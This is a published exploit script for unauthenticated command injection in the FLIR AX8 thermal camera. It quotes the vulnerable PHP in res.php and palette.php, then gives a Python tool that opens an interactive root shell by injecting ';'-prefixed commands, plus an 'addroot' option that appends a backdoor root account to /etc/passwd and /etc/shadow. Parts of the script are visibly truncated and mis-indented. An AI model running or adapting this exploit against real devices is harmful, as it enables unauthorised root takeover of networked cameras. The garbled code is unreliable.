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FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2018-10-16  
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2.   if (isset($_POST["action"])) {
# 3.     switch ($_POST["action"]) {
# 4.       case "get":
# 5.         if(isset($_POST["resource"]))
# 6.         {
# 7.           switch ($_POST["resource"]) {
# 8.             case ".rtp.hflip":
# 9.               if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10.                $result = "false";
# 11.                break;
# 12.              }
# 13.              $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14.              break;
# 15.            case ".rtp.vflip":
# 16.              if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17.                $result = "false";
# 18.                break;
# 19.              }
# 20.              $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21.              break;
# 22.            default:
# 23.              $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24.          }
# 25.        }
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2.   if(isset($_POST["palette"])){
# 3.     shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4.     echo json_encode(array("success"));
# 5.   }
# 6. ?>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
bannah = """
|         1984 Pictures           |
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|            presents             |
|                  ___            |
|                [|   |=|{)__     |
|                 |___| \/   )    |
|                  /|\      /|    |
|                 / | \     | \\   |
print bannah
print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'
ICU = '''
colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]
print '\x1b[1;37;44m'+'To freeze the stream run:   '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'
print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'
while True:
    zeTargets = 'http://'+sys.argv[1]+'/res.php'
    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
    zeHeaders = {'Cache-Control'   : 'max-age=0',
                 'User-Agent'      : 'thricer/251.4ev4h',
                 'Accept'          : 'text/html,application/xhtml+xml',
                 'Accept-Encoding' : 'gzip, deflate',
                 'Accept-Language' : 'mk-MK,mk;q=1.7',
                 'Connection'      : 'close',
                 'Connection-Type' : 'application/x-www-form-urlencoded'}
    zePardata = {'action'          : 'get',
                 'resource'        : ';'+zeCommand}
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        print json.loads(zeRequest.text)
        if zeCommand.strip() == 'exit':
        if zeCommand.strip() == 'addroot':
            print '[+] Blind command injection using palette.php...'
            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
            nuHeaders = zeHeaders
            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
            print '[*] Success!\n'
        else: pass
    except Exception:
        print '[*] Error!'
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